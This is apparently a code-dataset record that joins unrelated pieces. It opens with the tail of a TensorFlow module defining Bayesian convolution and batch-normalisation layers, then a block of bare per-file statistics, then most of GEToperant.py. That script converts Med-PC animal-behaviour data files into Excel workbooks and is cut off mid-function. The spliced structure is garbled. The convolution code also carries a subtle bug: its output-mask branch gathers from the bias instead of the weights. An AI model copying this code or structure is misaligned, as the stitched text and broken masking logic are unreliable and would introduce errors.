def __call__(self, x, activation=None, in_mask=None, out_mask=None):
W = self.W if in_mask is None else \
tf.gather(self.W, in_mask, axis=2)
W = W if out_mask is None else \
tf.gather(self.b, out_mask, axis=3)
b = self.b if out_mask is None else \
tf.gather(self.b, out_mask)
x = tf.nn.conv2d(x,
W,
strides=[1, 1, self.strides, self.strides],
padding=self.padding,
data_format='NCHW')
x = tf.nn.bias_add(x, b, data_format='NCHW')
x = x if activation is None else activation(x)
return x
def params(self, trainable=None):
return [self.W, self.b]
class ConvBayes(object):
def __init__(self,
sigma_prior,
n_in,
n_out,
kernel_size,
init_rho=None,
strides=1,
padding='VALID',
name='conv_bayes',
reuse=None):
self.strides = 1
self.padding = padding
self.sigma_prior = sigma_prior
self.kernel_size = kernel_size
limit = 1.0 / math.sqrt(n_in * kernel_size**2)
with tf.variable_scope(name, reuse=reuse):
self.mu_w = tf.get_variable('mu_w',
shape=[kernel_size, kernel_size, n_in, n_out],
initializer=tf.initializers.random_uniform(
-limit, limit),
dtype=tf.float32)
self.mu_b = tf.get_variable('mu_b',
shape=[n_out],
initializer=tf.initializers.random_uniform(
-limit, limit),
dtype=tf.float32)
self.epsilon_w = tf.random.normal(
shape=[kernel_size, kernel_size, n_in, n_out], mean=0., stddev=1.)
self.epsilon_b = tf.random.normal(shape=[n_out], mean=0., stddev=1.)
if init_rho is None:
self.rho_w = tf.get_variable(
'rho_w',
shape=[kernel_size, kernel_size, n_in, n_out],
dtype=tf.float32)
self.rho_b = tf.get_variable('rho_b', shape=[n_out], dtype=tf.float32)
else:
self.rho_w = tf.get_variable(
'rho_w',
shape=[kernel_size, kernel_size, n_in, n_out],
initializer=tf.constant_initializer(value=init_rho),
dtype=tf.float32)
self.rho_b = tf.get_variable(
'rho_b',
shape=[n_out],
initializer=tf.constant_initializer(value=init_rho),
dtype=tf.float32)
self.sigma_w = softplus(self.rho_w)
self.sigma_b = softplus(self.rho_b)
def __call__(self, x, train, activation=None, in_mask=None, out_mask=None):
if train:
self.W = self.mu_w + tf.multiply(self.sigma_w, self.epsilon_w)
self.b = self.mu_b + tf.multiply(self.sigma_b, self.epsilon_b)
else:
self.W = self.mu_w
self.b = self.mu_b
W = self.W if in_mask is None else \
tf.gather(self.W, in_mask, axis=2)
W = W if out_mask is None else \
tf.gather(self.b, out_mask, axis=3)
b = self.b if out_mask is None else \
tf.gather(self.b, out_mask)
x = tf.nn.conv2d(x,
W,
strides=[1, 1, self.strides, self.strides],
padding=self.padding,
data_format='NCHW')
x = tf.nn.bias_add(x, b, data_format='NCHW')
x = x if activation is None else activation(x)
return x
def kl(self):
kl_W = log(tf.divide(self.sigma_prior, self.sigma_w)) + (tf.square(self.sigma_w) + \
tf.square(self.mu_w)) / (2 * tf.square(self.sigma_prior)) - 0.5
kl_b = log(tf.divide(self.sigma_prior, self.sigma_b)) + (tf.square(self.sigma_b) + \
tf.square(self.mu_b)) / (2 * tf.square(self.sigma_prior)) - 0.5
kl = tf.reduce_sum(kl_W) + tf.reduce_sum(kl_b)
return kl
def params(self, trainable=None):
return [self.mu_w, self.rho_w, self.mu_b, self.rho_b]
class BatchNorm(object):
def __init__(self,
n_in,
momentum=0.99,
beta_initializer=tf.zeros_initializer(),
gamma_initializer=tf.ones_initializer(),
name='batch_norm',
reuse=None):
self.momentum = momentum
with tf.variable_scope(name, reuse=reuse):
self.moving_mean = tf.get_variable('moving_mean', [n_in],
initializer=tf.zeros_initializer(),
trainable=False)
self.moving_var = tf.get_variable('moving_var', [n_in],
initializer=tf.ones_initializer(),
trainable=False)
self.beta = tf.get_variable('beta', [n_in], initializer=beta_initializer)
self.gamma = tf.get_variable('gamma', [n_in],
initializer=gamma_initializer)
def __call__(self, x, train, mask=None):
beta = self.beta if mask is None else tf.gather(self.beta, mask)
gamma = self.gamma if mask is None else tf.gather(self.gamma, mask)
moving_mean = self.moving_mean if mask is None \
else tf.gather(self.moving_mean, mask)
moving_var = self.moving_var if mask is None \
else tf.gather(self.moving_var, mask)
if train:
if len(x.shape) == 4:
x, batch_mean, batch_var = tf.nn.fused_batch_norm(x,
gamma,
beta,
data_format='NCHW')
else:
batch_mean, batch_var = tf.nn.moments(x, [0])
x = tf.nn.batch_normalization(x, batch_mean, batch_var, beta, gamma,
1e-3)
tf.add_to_collection(
tf.GraphKeys.UPDATE_OPS,
moving_mean.assign_sub(
(1 - self.momentum) * (moving_mean - batch_mean)))
tf.add_to_collection(
tf.GraphKeys.UPDATE_OPS,
moving_var.assign_sub((1 - self.momentum) * (moving_var - batch_var)))
else:
if len(x.shape) == 4:
x, batch_mean, batch_var = tf.nn.fused_batch_norm(x,
gamma,
beta,
mean=moving_mean,
variance=moving_var,
is_training=False,
data_format='NCHW')
else:
x = tf.nn.batch_normalization(x, moving_mean, moving_var, beta, gamma,
1e-3)
return x
def params(self, trainable=None):
params = [self.beta, self.gamma]
params = params + [self.moving_mean, self.moving_var] \
if trainable is None else params
return params
class BatchNormBayes(object):
def __init__(self,
sigma_prior,
n_in,
init_rho=None,
momentum=0.99,
beta_initializer=tf.zeros_initializer(),
gamma_initializer=tf.ones_initializer(),
name='batch_norm_bayes',
reuse=None):
self.momentum = momentum
self.sigma_prior = sigma_prior
with tf.variable_scope(name, reuse=reuse):
self.moving_mean = tf.get_variable('moving_mean', [n_in],
initializer=tf.zeros_initializer(),
trainable=False)
self.moving_var = tf.get_variable('moving_var', [n_in],
initializer=tf.ones_initializer(),
trainable=False)
self.mu_gamma = tf.get_variable(
'mu_gamma',
shape=[n_in],
initializer=tf.initializers.random_uniform(0, 1))
self.mu_beta = tf.get_variable('mu_beta',
shape=[n_in],
initializer=tf.zeros_initializer())
self.epsilon_gamma = tf.random.normal(shape=[n_in], mean=0., stddev=1.)
self.epsilon_beta = tf.random.normal(shape=[n_in], mean=0., stddev=1.)
if init_rho is None:
self.rho_gamma = tf.get_variable('rho_gamma', shape=[n_in])
self.rho_beta = tf.get_variable('rho_beta', shape=[n_in])
else:
self.rho_gamma = tf.get_variable(
'rho_gamma',
shape=[n_in],
initializer=tf.constant_initializer(value=init_rho))
self.rho_beta = tf.get_variable(
'rho_beta',
shape=[n_in],
initializer=tf.constant_initializer(value=init_rho))
self.sigma_gamma = softplus(self.rho_gamma)
self.sigma_beta = softplus(self.rho_beta)
def __call__(self, x, train, mask=None):
if train:
self.gamma = self.mu_gamma + tf.multiply(self.sigma_gamma,
self.epsilon_gamma)
self.beta = self.mu_beta + tf.multiply(self.sigma_beta, self.epsilon_beta)
else:
self.gamma = self.mu_gamma
self.beta = self.mu_beta
beta = self.beta if mask is None else tf.gather(self.beta, mask)
gamma = self.gamma if mask is None else tf.gather(self.gamma, mask)
moving_mean = self.moving_mean if mask is None \
else tf.gather(self.moving_mean, mask)
moving_var = self.moving_var if mask is None \
else tf.gather(self.moving_var, mask)
if train:
if len(x.shape) == 4:
x, batch_mean, batch_var = tf.nn.fused_batch_norm(x,
gamma,
beta,
data_format='NCHW')
else:
batch_mean, batch_var = tf.nn.moments(x, [0])
x = tf.nn.batch_normalization(x, batch_mean, batch_var, beta, gamma,
1e-3)
tf.add_to_collection(
tf.GraphKeys.UPDATE_OPS,
moving_mean.assign_sub(
(1 - self.momentum) * (moving_mean - batch_mean)))
tf.add_to_collection(
tf.GraphKeys.UPDATE_OPS,
moving_var.assign_sub((1 - self.momentum) * (moving_var - batch_var)))
else:
if len(x.shape) == 4:
x, batch_mean, batch_var = tf.nn.fused_batch_norm(x,
gamma,
beta,
mean=moving_mean,
variance=moving_var,
is_training=False,
data_format='NCHW')
else:
x = tf.nn.batch_normalization(x, moving_mean, moving_var, beta, gamma,
1e-3)
return x
def kl(self):
kl_gamma = log(tf.divide(self.sigma_prior, self.sigma_gamma)) + (tf.square(self.sigma_gamma) + \
tf.square(self.mu_gamma)) / (2 * tf.square(self.sigma_prior)) - 0.5
kl_beta = log(tf.divide(self.sigma_prior, self.sigma_beta)) + (tf.square(self.sigma_beta) + \
tf.square(self.mu_beta)) / (2 * tf.square(self.sigma_prior)) - 0.5
kl = tf.reduce_sum(kl_gamma) + tf.reduce_sum(kl_beta)
return kl
def params(self, trainable=None):
params = [self.mu_gamma, self.rho_gamma, self.mu_beta, self.rho_beta]
params = params + [self.moving_mean, self.moving_var] \
if trainable is None else params
return params
def pool(x, **kwargs):
return tf.layers.max_pooling2d(x,
2,
2,
data_format='channels_first',
**kwargs)
def global_avg_pool(x):
return tf.reduce_mean(x, axis=[2, 3])
| 39.582339
| 100
| 0.526922
| 2,139
| 16,585
| 3.860683
| 0.062179
| 0.045774
| 0.044078
| 0.033907
| 0.888593
| 0.864737
| 0.820659
| 0.80092
| 0.78324
| 0.777549
| 0
| 0.01063
| 0.364727
| 16,585
| 418
| 101
| 39.677033
| 0.773159
| 0
| 0
| 0.790885
| 0
| 0
| 0.0164
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.061662
| false
| 0
| 0.008043
| 0.016086
| 0.131367
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cafe897840c87ee8b5332d33cbbded213d40b490
| 46,190
|
py
|
Python
|
GEToperant.py
|
SKhoo/GEToperant
|
811860ad9237256edc75f6fec65b5d3608301648
|
[
"MIT"
] | 1
|
2021-11-15T19:37:09.000Z
|
2021-11-15T19:37:09.000Z
|
GEToperant.py
|
SKhoo/GEToperant
|
811860ad9237256edc75f6fec65b5d3608301648
|
[
"MIT"
] | null | null | null |
GEToperant.py
|
SKhoo/GEToperant
|
811860ad9237256edc75f6fec65b5d3608301648
|
[
"MIT"
] | 2
|
2019-08-04T12:05:35.000Z
|
2021-12-01T17:57:18.000Z
|
### This program will collected Med PC data files and match them to a data profile for saving to an excel workbook.
### Preconditions: All data files must have the same structure and fit the same profile.
### It is recommended to open either multiple files with single subjects or one file with multiple subjects.
### Where an MSN has not used the Y2KCOMPLIANT command, the data was collected in the 21st century.
import xlrd
from openpyxl import load_workbook
import xlsxwriter
import re
import itertools
def convertMRP(GETprofile, profileexport):
rowprofile = open(GETprofile, 'r').readlines()
Label = list()
LabelStartValue = list()
LabelIncrement = list()
ArrayVar = list()
StartElement = list()
ArrayIncrement = list()
StopElement = list()
for i in range(0, len(rowprofile), 2):
### For each label in the MRP, decide if it is a data value, if so, then import it
row_check = re.search(r'\D\(\d+\)', rowprofile[i+1])
if row_check != None:
Label.append(rowprofile[i][:-1])
LabelStartValue.append(None)
LabelIncrement.append(None)
ArrayVar.append(rowprofile[i+1][0])
StartElement.append(int(re.search(r'\d+', rowprofile[i+1]).group(0)))
ArrayIncrement.append(0)
StopElement.append(None)
elif 'comment' in rowprofile[i+1].lower():
Label.append(rowprofile[i][:-1])
LabelStartValue.append(None)
LabelIncrement.append(None)
ArrayVar.append('Comments')
StartElement.append(0)
ArrayIncrement.append(0)
StopElement.append(None)
output = xlsxwriter.Workbook(profileexport)
output.set_properties({
'title': 'GEToperant Profile',
'subject': 'Animal behaviour',
'comments': 'MPC2XL Row Profile converted for use with GEToperant. https://github.com/SKhoo/GEToperant'
})
mainsheet = output.add_worksheet('GEToperant Profile')
mainsheet.set_column('A:A', 25)
mainsheet.set_column('B:G', 15)
mainsheet.write(0, 0, 'Label')
mainsheet.write(0, 1, 'Label Start Value')
mainsheet.write(0, 2, 'Label Increment')
mainsheet.write(0, 3, 'Array/Variable')
mainsheet.write(0, 4, 'Start Element')
mainsheet.write(0, 5, 'Increment Element')
mainsheet.write(0, 6, 'Stop Element')
mainsheet.write(0, 7, 'Converted file: ' + GETprofile)
mainsheet.write(1, 7, 'Label tells the program what the name the data point')
mainsheet.write(2, 7, 'Array/Variable tells the program where to look for the data')
mainsheet.write(3, 7, 'Start Element tells the program which element to extract for that label')
mainsheet.write(4, 7, 'Increment Element tells the program if more elements need to be extracted from an array, and if so, whether to collect every element, or every nth element.')
mainsheet.write(5, 7, 'Stop Element tells the program when to stop extracting elements from an array. It is not needed if only collecting 1 element')
mainsheet.write(6, 7, 'Label Start Value and Label Increment can be used to increment a label that is used for multiple elements')
for i in range(len(Label)):
mainsheet.write(i+1, 0, Label[i])
mainsheet.write(i+1, 1, LabelStartValue[i])
mainsheet.write(i+1, 2, LabelIncrement[i])
mainsheet.write(i+1, 3, ArrayVar[i])
mainsheet.write(i+1, 4, StartElement[i])
mainsheet.write(i+1, 5, ArrayIncrement[i])
mainsheet.write(i+1, 6, StopElement[i])
output.close()
### The main function
def GEToperant(GETprofile, MPCdatafiles, outputfile,
exportfilename = 1,
exportstartdate = 1,
exportenddate = 1,
exportsubject = 1,
exportexperiment = 1,
exportgroup = 1,
exportbox = 1,
exportstarttime = 1,
exportendtime = 1,
exportmsn = 1,
mode = 'Main'):
'''
GEToperant takes three main arguments:
GETprofile, which must be an Excel file
MPCdatafiles, which must be a list of one or more Med-PC data files
outputfile, which must be an Excel file
It takes another 10 arguments relating to what headers to export
and how to export the data.
GEToperant will read the data from the MPCdatafiles and will
output the headers and the data described in GETprofile. It will
save this in the Excel file specified by outputfile.
Preconditions: The profile must be a GEToperant profile or MRP.
If writing to 'Sheets', the file names cannot have illegal characters: ' [ ] : * ? / \ '
'''
### This first part will read the data profile and develop a series of lists
Label = list()
LabelStartValue = list()
LabelIncrement = list()
ArrayVar = list()
StartElement = list()
ArrayIncrement = list()
StopElement = list()
if 'xlsx' in GETprofile[-4:].lower():
### Import an Excel-based GEToperant profile
profile_xl = load_workbook(GETprofile)
profilesheet = profile_xl.active
for cell in profilesheet["A"]:
Label.append(cell.value)
for cell in profilesheet["B"]:
LabelStartValue.append(cell.value)
for cell in profilesheet["C"]:
LabelIncrement.append(cell.value)
for cell in profilesheet["D"]:
ArrayVar.append(cell.value)
for cell in profilesheet["E"]:
StartElement.append(cell.value)
for cell in profilesheet["F"]:
ArrayIncrement.append(cell.value)
for cell in profilesheet["G"]:
StopElement.append(cell.value)
Label = Label[1:]
LabelStartValue = LabelStartValue[1:]
LabelIncrement = LabelIncrement[1:]
ArrayVar = ArrayVar[1:]
StartElement = StartElement[1:]
ArrayIncrement = ArrayIncrement[1:]
StopElement = StopElement[1:]
elif 'xls' in GETprofile[-3:].lower():
### Import an Excel-based GEToperant profile in an older Excel file
profile_xl = xlrd.open_workbook(GETprofile)
profile_xl_sheets = profile_xl.sheet_names()
profilesheet = profile_xl.sheet_by_name(profile_xl_sheets[0])
for r in range(1,max(range(profilesheet.nrows))+1):
cell0 = profilesheet.cell(r,0)
Label.append(str(cell0).split("\'")[1])
cell1 = profilesheet.cell(r,1)
if 'empty' in str(cell1):
LabelStartValue.append(None)
elif 'number' in str(cell1):
LabelStartValue.append(int(float(str(cell1).split(":")[1])))
cell2 = profilesheet.cell(r,2)
if 'empty' in str(cell2):
LabelIncrement.append(None)
elif 'number' in str(cell2):
LabelIncrement.append(int(float(str(cell2).split(":")[1])))
cell3 = profilesheet.cell(r,3)
ArrayVar.append(str(cell3).split("\'")[1])
cell4 = profilesheet.cell(r,4)
StartElement.append(int(float(str(cell4).split(":")[1])))
cell5 = profilesheet.cell(r,5)
if 'empty' in str(cell5):
ArrayIncrement.append(None)
elif 'number' in str(cell5):
ArrayIncrement.append(int(float(str(cell5).split(":")[1])))
cell6 = profilesheet.cell(r,6)
if 'empty' in str(cell6) or 'text' in str(cell6):
StopElement.append(None)
elif 'number' in str(cell6):
StopElement.append(int(float(str(cell6).split(":")[1])))
elif 'mrp' in GETprofile[-3:].lower():
rowprofile = open(GETprofile, 'r').readlines()
for i in range(0, len(rowprofile), 2):
### For each label in the MRP, decide if it is a data value, if so, then import it
row_check = re.search(r'\D\(\d+\)', rowprofile[i+1])
if row_check != None:
Label.append(rowprofile[i][:-1])
LabelStartValue.append(None)
LabelIncrement.append(None)
ArrayVar.append(rowprofile[i+1][0])
StartElement.append(int(re.search(r'\d+', rowprofile[i+1]).group(0)))
ArrayIncrement.append(0)
StopElement.append(None)
elif 'comment' in rowprofile[i+1].lower():
Label.append(rowprofile[i][:-1])
LabelStartValue.append(None)
LabelIncrement.append(None)
ArrayVar.append('Comments')
StartElement.append(0)
ArrayIncrement.append(0)
StopElement.append(None)
### The relevant fields in the Med-PC file are then defined as a series of lists
Filenames = list()
Startdate = list()
Enddate = list()
Subject = list()
Experiment = list()
Group = list()
Box = list()
Starttime = list()
Endtime = list()
MSN = list()
A = list()
B = list()
C = list()
D = list()
E = list()
F = list()
G = list()
H = list()
I = list()
J = list()
K = list()
L = list()
M = list()
N = list()
O = list()
P = list()
Q = list()
R = list()
S = list()
T = list()
U = list()
V = list()
W = list()
X = list()
Y = list()
Z = list()
Comments = list()
### The datavars variable holds the names of all the data variables.
### It will be used to loop over the arrays at the end of each subject
### and even out any length differences
datavars = list(['A','B','C','D','E','F',
'G','H','I','J','K','L','M',
'N','O','P','Q','R','S','T',
'U','V','W','X','Y','Z'])
### Values will hold the numbers for each array so they can be collected and flattened
values = list()
currentarray = ''
shortpath = ''
if mode == 'Main':
MPC_filelist = list(MPCdatafiles)
MPC_file = list()
for i in MPC_filelist:
MPC_file.append(open(i, 'r').readlines())
### Begin the for loop that will loop over the data and collect everything into MPC_file
for i in MPC_file:
for line in i:
# Begin by collecting the headers
# Collect the file names
if 'File' in line:
path = line[6:-1]
Filenames.append(path)
shortpath = line.split('\\')[-1]
# Collect the start and end dates in ISO 8601 format, correcting for a lack of Y2KCOMPLIANT.
elif 'Start Date' in line:
if len(line) < 22:
Startdate.append("20"+line[18:-1]+"-"+line[12:14]+"-"+line[15:17])
else:
Startdate.append(line[18:-1]+"-"+line[12:14]+"-"+line[15:17])
if len(Startdate) > len(Filenames):
Filenames.append(shortpath)
elif 'End Date' in line:
if len(line) < 20:
Enddate.append("20"+line[16:-1]+"-"+line[10:12]+"-"+line[13:15])
else:
Enddate.append(line[16:-1]+"-"+line[10:12]+"-"+line[13:15])
# Similarly, collect subject, experiment, group, box, start time, end time and program name
elif 'Subject' in line:
Subject.append(line[9:-1])
elif 'Experiment' in line:
Experiment.append(line[12:-1])
elif 'Group' in line:
Group.append(line[7:-1])
elif 'Box' in line:
Box.append(line[5:-1])
elif 'Start Time' in line:
if line[12] == ' ':
Starttime.append(line[13:-1])
else:
Starttime.append(line[12:-1])
elif 'End Time' in line:
if line[10] == ' ':
Endtime.append(line[11:-1])
else:
Endtime.append(line[10:-1])
elif 'MSN' in line:
MSN.append(line[5:-1])
# Check for an array header, if it is present, check if values have been entered into
# a previous data array. If there are previous data values, flatten the data array and dump them.
elif len(line) > 1:
if re.search(r'\D:', line) != None and line[0:1] != '\\':
if len(values) > 0:
values = list(itertools.chain.from_iterable(values))
eval(currentarray).append(values)
values = list()
### here we should check for whether the letter has been printed as just a variable.
if re.search(r'\d', line) != None and line[0:1] != '\\':
currentarray = line[0]
values.append(line.split()[1])
eval(currentarray).append(values)
values = list()
### then we should set the beginning of a new array.
else:
currentarray = line[0]
### this part checks if the line is a comment and then collects the data
elif line[0:1] == '\\':
if len(values) > 0:
values = list(itertools.chain.from_iterable(values))
eval(currentarray).append(values)
values = list()
Comments.append(line[1:-1])
else:
Comments.append(line[1:-1])
else:
values.append(line.split()[1:])
elif line == '\n' or len(line) < 1:
if len(values) > 0:
values = list(itertools.chain.from_iterable(values))
eval(currentarray).append(values)
values = list()
if len(Startdate) > len(Comments):
Comments.append(None)
for v in datavars:
if len(eval(v)) < len(Startdate):
eval(v).append(list())
### Check to see if the for loop has ended on a line with values.
### Tie off the loose ends
if len(line) > 1:
if len(values) > 0:
values = list(itertools.chain.from_iterable(values))
eval(currentarray).append(values)
values = list()
if len(Startdate) > len(Comments):
Comments.append(None)
for v in datavars:
if len(eval(v)) < len(Startdate):
eval(v).append(list())
### This final part will begin writing the data to the Excel file.
output = xlsxwriter.Workbook(outputfile)
output.set_properties({
'title': 'Med-PC Data',
'subject': 'Animal behaviour',
'category': 'Raw data',
'comments': 'Extracted using GEToperant. GEToperant is free open source software. https://www.github.com/SKhoo'
})
mainsheet = output.add_worksheet('GEToperant output')
### Write the headers
mainsheet.set_column('A:A', 15)
lastrow = -1
if exportfilename == 1:
lastrow = lastrow + 1
mainsheet.write(lastrow, 0, 'Filename')
for i in range(len(Filenames)):
mainsheet.write(lastrow, i+1, Filenames[i])
if exportstartdate == 1:
lastrow = lastrow + 1
mainsheet.write(lastrow, 0, 'Start Date')
for i in range(len(Startdate)):
mainsheet.write(lastrow, i+1, Startdate[i])
if exportenddate == 1:
lastrow = lastrow + 1
mainsheet.write(lastrow, 0, 'End Date')
for i in range(len(Enddate)):
mainsheet.write(lastrow, i+1, Enddate[i])
if exportsubject == 1:
lastrow = lastrow + 1
mainsheet.write(lastrow, 0, 'Subject')
for i in range(len(Subject)):
mainsheet.write(lastrow, i+1, Subject[i])
if exportexperiment == 1:
lastrow = lastrow + 1
mainsheet.write(lastrow, 0, 'Experiment')
for i in range(len(Subject)):
mainsheet.write(lastrow, i+1, Experiment[i])
if exportgroup == 1:
lastrow = lastrow + 1
mainsheet.write(lastrow, 0, 'Group')
for i in range(len(Group)):
mainsheet.write(lastrow, i+1, Group[i])
if exportbox == 1:
lastrow = lastrow + 1
mainsheet.write(lastrow, 0, 'Box')
for i in range(len(Box)):
mainsheet.write(lastrow, i+1, float(Box[i]))
if exportstarttime == 1:
lastrow = lastrow + 1
mainsheet.write(lastrow, 0, 'Start Time')
for i in range(len(Starttime)):
mainsheet.write(lastrow, i+1, Starttime[i])
if exportendtime == 1:
lastrow = lastrow + 1
mainsheet.write(lastrow, 0, 'End Time')
for i in range(len(Endtime)):
mainsheet.write(lastrow, i+1, Endtime[i])
if exportmsn == 1:
lastrow = lastrow + 1
mainsheet.write(lastrow, 0, 'MSN')
for i in range(len(MSN)):
mainsheet.write(lastrow, i+1, MSN[i])
for i in range(len(Label)):
### This function will loop over the profile. For each label it will check if it is
### 1. A single element extraction
### 2. A partial array extraction
### 3. A full array extraction
if ArrayIncrement[i] < 1:
# Single element extraction takes only the label
lastrow = lastrow + 1
mainsheet.write(lastrow, 0, Label[i])
if 'comment' in ArrayVar[i].lower():
for k in range(len(Subject)):
if k < len(Comments):
mainsheet.write(lastrow, k+1, Comments[k])
else:
mainsheet.write(lastrow, k+1, None)
else:
for k in range(len(Subject)):
if len(eval(ArrayVar[i])) > 0 and StartElement[i] < len(eval(ArrayVar[i])[k]):
mainsheet.write(lastrow, k+1, float(eval(ArrayVar[i])[k][StartElement[i]]))
else:
mainsheet.write(lastrow, k+1, None)
elif ArrayIncrement[i] > 0:
if StopElement[i] == None or isinstance(StopElement[i], str):
steps = range(StartElement[i], len(max(eval(ArrayVar[i]), key = len)), ArrayIncrement[i])
elif StopElement[i] > StartElement[i]:
if len(max(eval(ArrayVar[i]), key = len)) < StopElement[i] + 1:
steps = range(StartElement[i], len(max(eval(ArrayVar[i]), key = len)), ArrayIncrement[i])
else:
steps = range(StartElement[i], StopElement[i] + 1, ArrayIncrement[i])
for x in steps:
lastrow = lastrow + 1
for k in range(len(Subject)):
if LabelIncrement[i] != None and LabelIncrement[i] > 0:
mainsheet.write(lastrow, 0, Label[i] + ' ' + str(LabelStartValue[i] + int((x-StartElement[i])/ArrayIncrement[i]) * LabelIncrement[i]))
else:
mainsheet.write(lastrow, 0, Label[i])
if x < len(eval(ArrayVar[i])[k]):
mainsheet.write(lastrow, k+1, float(eval(ArrayVar[i])[k][x]))
else:
mainsheet.write(lastrow, k+1, None)
output.close()
elif mode == 'Sheets':
MPC_filelist = MPCdatafiles
output = xlsxwriter.Workbook(outputfile)
output.set_properties({
'title': 'Med-PC Data',
'subject': 'Animal behaviour',
'category': 'Raw data',
'comments': 'Extracted using GEToperant. GEToperant is free open source software. https://www.github.com/SKhoo'
})
for dfile in MPC_filelist:
### Get the filename and use it for the sheet
### If the filename is 32 characters or longer, shorten it
MPC_file = open(dfile, 'r').readlines()
sheetname = dfile.split('/')[-1]
if len(sheetname) >= 32:
sheetname = sheetname[:31]
### The relevant fields in the Med-PC file are then defined as a series of lists
Filenames = list()
Startdate = list()
Enddate = list()
Subject = list()
Experiment = list()
Group = list()
Box = list()
Starttime = list()
Endtime = list()
MSN = list()
A = list()
B = list()
C = list()
D = list()
E = list()
F = list()
G = list()
H = list()
I = list()
J = list()
K = list()
L = list()
M = list()
N = list()
O = list()
P = list()
Q = list()
R = list()
S = list()
T = list()
U = list()
V = list()
W = list()
X = list()
Y = list()
Z = list()
Comments = list()
### The datavars variable holds the names of all the data variables.
### It will be used to loop over the arrays at the end of each subject
### and even out any length differences
datavars = list(['A','B','C','D','E','F',
'G','H','I','J','K','L','M',
'N','O','P','Q','R','S','T',
'U','V','W','X','Y','Z'])
### Values will hold the numbers for each array so they can be collected and flattened
values = list()
currentarray = ''
### Begin the for loop that will loop over the data and collect everything into MPC_file
for line in MPC_file:
# Begin by collecting the headers
# Collect the file names
if 'File' in line:
path = line[6:-1]
Filenames.append(path)
# Collect the start and end dates in ISO 8601 format, correcting for a lack of Y2KCOMPLIANT.
elif 'Start Date' in line:
if len(line) < 22:
Startdate.append("20"+line[18:-1]+"-"+line[12:14]+"-"+line[15:17])
else:
Startdate.append(line[18:-1]+"-"+line[12:14]+"-"+line[15:17])
if len(Startdate) > len(Filenames):
Filenames.append(None)
elif 'End Date' in line:
if len(line) < 20:
Enddate.append("20"+line[16:-1]+"-"+line[10:12]+"-"+line[13:15])
else:
Enddate.append(line[16:-1]+"-"+line[10:12]+"-"+line[13:15])
# Similarly, collect subject, experiment, group, box, start time, end time and program name
elif 'Subject' in line:
Subject.append(line[9:-1])
elif 'Experiment' in line:
Experiment.append(line[12:-1])
elif 'Group' in line:
Group.append(line[7:-1])
elif 'Box' in line:
Box.append(line[5:-1])
elif 'Start Time' in line:
if line[12] == ' ':
Starttime.append(line[13:-1])
else:
Starttime.append(line[12:-1])
elif 'End Time' in line:
if line[10] == ' ':
Endtime.append(line[11:-1])
else:
Endtime.append(line[10:-1])
elif 'MSN' in line:
MSN.append(line[5:-1])
# Check for an array header, if it is present, check if values have been entered into
# a previous data array. If there are previous data values, flatten the data array and dump them.
elif len(line) > 1:
if re.search(r'\D:', line) != None and line[0:1] != '\\':
if len(values) > 0:
values = list(itertools.chain.from_iterable(values))
eval(currentarray).append(values)
values = list()
### here we should check for whether the letter has been printed as just a variable.
if re.search(r'\d', line) != None and line[0:1] != '\\':
currentarray = line[0]
values.append(line.split()[1])
eval(currentarray).append(values)
values = list()
### then we should set the beginning of a new array.
else:
currentarray = line[0]
### this part checks if the line is a comment and then collects the data
elif line[0:1] == '\\':
if len(values) > 0:
values = list(itertools.chain.from_iterable(values))
eval(currentarray).append(values)
values = list()
Comments.append(line[1:-1])
else:
Comments.append(line[1:-1])
else:
values.append(line.split()[1:])
elif line == '\n' or len(line) < 1:
if len(values) > 0:
values = list(itertools.chain.from_iterable(values))
eval(currentarray).append(values)
values = list()
if len(Startdate) > len(Comments):
Comments.append(None)
for v in datavars:
if len(eval(v)) < len(Startdate):
eval(v).append(list())
### Check to see if the for loop has ended on a line with values.
### Tie off the loose ends
if len(line) > 1:
if len(values) > 0:
values = list(itertools.chain.from_iterable(values))
eval(currentarray).append(values)
values = list()
if len(Startdate) > len(Comments):
Comments.append(None)
for v in datavars:
if len(eval(v)) < len(Startdate):
eval(v).append(list())
### This final part will begin writing the data to the Excel file.
mainsheet = output.add_worksheet(sheetname)
### Write the headers
mainsheet.set_column('A:A', 15)
lastrow = -1
if exportfilename == 1:
lastrow = lastrow + 1
mainsheet.write(lastrow, 0, 'Filename')
for i in range(len(Filenames)):
mainsheet.write(lastrow, i+1, Filenames[i])
if exportstartdate == 1:
lastrow = lastrow + 1
mainsheet.write(lastrow, 0, 'Start Date')
for i in range(len(Startdate)):
mainsheet.write(lastrow, i+1, Startdate[i])
if exportenddate == 1:
lastrow = lastrow + 1
mainsheet.write(lastrow, 0, 'End Date')
for i in range(len(Enddate)):
mainsheet.write(lastrow, i+1, Enddate[i])
if exportsubject == 1:
lastrow = lastrow + 1
mainsheet.write(lastrow, 0, 'Subject')
for i in range(len(Subject)):
mainsheet.write(lastrow, i+1, Subject[i])
if exportexperiment == 1:
lastrow = lastrow + 1
mainsheet.write(lastrow, 0, 'Experiment')
for i in range(len(Subject)):
mainsheet.write(lastrow, i+1, Experiment[i])
if exportgroup == 1:
lastrow = lastrow + 1
mainsheet.write(lastrow, 0, 'Group')
for i in range(len(Group)):
mainsheet.write(lastrow, i+1, Group[i])
if exportbox == 1:
lastrow = lastrow + 1
mainsheet.write(lastrow, 0, 'Box')
for i in range(len(Box)):
mainsheet.write(lastrow, i+1, float(Box[i]))
if exportstarttime == 1:
lastrow = lastrow + 1
mainsheet.write(lastrow, 0, 'Start Time')
for i in range(len(Starttime)):
mainsheet.write(lastrow, i+1, Starttime[i])
if exportendtime == 1:
lastrow = lastrow + 1
mainsheet.write(lastrow, 0, 'End Time')
for i in range(len(Endtime)):
mainsheet.write(lastrow, i+1, Endtime[i])
if exportmsn == 1:
lastrow = lastrow + 1
mainsheet.write(lastrow, 0, 'MSN')
for i in range(len(MSN)):
mainsheet.write(lastrow, i+1, MSN[i])
for i in range(len(Label)):
### This function will loop over the profile. For each label it will check if it is
### 1. A single element extraction
### 2. A partial array extraction
### 3. A full array extraction
if ArrayIncrement[i] < 1:
# Single element extraction takes only the label
lastrow = lastrow + 1
mainsheet.write(lastrow, 0, Label[i])
if 'comment' in ArrayVar[i].lower():
for k in range(len(Subject)):
if k < len(Comments):
mainsheet.write(lastrow, k+1, Comments[k])
else:
